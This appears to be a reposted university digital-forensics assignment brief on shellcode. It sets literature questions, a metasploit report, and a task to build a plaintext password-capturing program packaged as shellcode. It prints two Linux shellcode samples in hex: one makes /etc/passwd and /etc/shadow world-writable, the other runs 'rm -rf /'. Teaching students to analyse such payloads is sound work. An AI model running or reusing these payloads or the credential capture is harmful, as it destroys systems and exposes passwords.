Reference no: EM133026099

SIT703 Advanced Digital Forensics Assignment - Deakin University, Australia

Assessment - Technical Report

Learning Outcomes - This assessment assesses the following Unit Learning Outcomes

ULO1: Apply knowledge of security on Windows network domain and follow standard procedure to investigate different types of cyber-crime.

ULO 2: Investigate the usefulness of various forensic techniques and apply relevant methods to gain access and recover computer crime data.

Purpose - Students should demonstrate their ability to review literature on shellcode and develop knowledge in technical exploits and their impacts on the Windows network domain. Students will be required to compare different techniques and generate their own shellcode based on the requirements provided and implement a fully functional shellcode. Students will be assessed on their ability to perform the required tasks of synthesizing knowledge from research papers, video demonstrations, and technical tutorials and present a technical report.

Instructions - Students are required to put together a technical report of approximately 2000 words as well as exhibits to support findings and a bibliography. This report should consist of:

-an overview of shellcode

-comparison of different methods used to generate shellcode

-analysis and reflection on the technical exploitations and their impact on the Windows network domain

-implementation of a shellcode

Problem Statement -

Part A - Shellcode In Literature

Students are required to answer research questions based on three academic papers:

-"The Shellcode Generation"

-"Evasion Techniques"

-"English Shellcode"

-"Automatic Shellcode Transplant"

There should be at least four additional references from recent academic (IEEE or ACM) research papers or white papers from IT companies. Students must perform their own research for additional references.

1. In the paper "The Shellcode Generation", what is the development bottom-line for an exploit? List and give detailed explanations to the three components for a usable exploit.

2. Read the paper "Evasion Techniques", and explain how a piece of shellcode can bypass an intrusion detection system. more information about the shellcode issues related to computer forensic investigations.

3. Read the paper "English Shellcode", explain the concept of program counter and its importance to an attacker who uses shellcodes.

4. In the paper "Automatic Shellcode Transplant", what are the two challenges of the transplanted shellcode?

Part B - Shellcode in Practice

Suppose you are working for an IT security company which is subcontracted by Deakin University to test the system security of the campus network. Your manager wants you to attempt to write shellcode which takes a user's account name and his/her password and stores the information as plain text in a text file called user.dat in the user's current directory.

Requirements -

1. You should implement a C program to ask a user to type his username and password one a command line input (i.e., from the standard input channel).

2. Your program should demand at least two user attempts of inputting the passwords. That is, your program should only terminate when the user has entered two identical passwords.

3. Your program should store the username and password pair into a text file called "user.dat" in the current directory.

4. You should package your C code into a shellcode by using ShellMe (A tutorial of using ShellMe is presented in the second week's practical class).

Identify the following two pieces of shellcode by describe their designed actions:

Shellcode 1-

\x31\xc0\x66\xb9\xb6\x01\x50\x68\x73\x73\x77\x64

\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3

\xb0\x0f\xcd\x80\x31\xc0\x50\x68\x61\x64\x6f\x77

\x68\x2f\x2f\x73\x68\x68\x2f\x65\x74\x63\x89\xe3

\xb0\x0f\xcd\x80\x31\xc0\x40\xcd\x80

Shellcode 2-

\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89

\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68

\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80

Part C - Shellcode in Application

You need to write a short report to demonstrate your level of understanding about shellcode and its application on hacking platforms, operating systems vulnerability, penetration testing and exploitation. Your report should consist of the following parts:

1. List and explain every command used in the metasploit demo.

2. Identify the name of the shellcode used in the demo, reproduce its contents in hex and provide a screen capture of it in your report, and explain what this shellcode is capable of doing.

3. Find and list at least five different shellcode-generating approaches. Then compare the advantages and disadvantages from the viewpoint of attackers.

4. Describe the concept of polymorphic shellcode. And discuss the impact of misusing penetration toolkits such as Metasploit for malicious purposes.

General Requirements - Your answers towards the above three Parts will form an essay for submission. Your essay should include an introduction section, a body section addressing the four parts listed above, a conclusion section and a reference section. Your essay should have at least 2,000 words.

Attachment:- Advanced Digital Forensics Assignment File.rar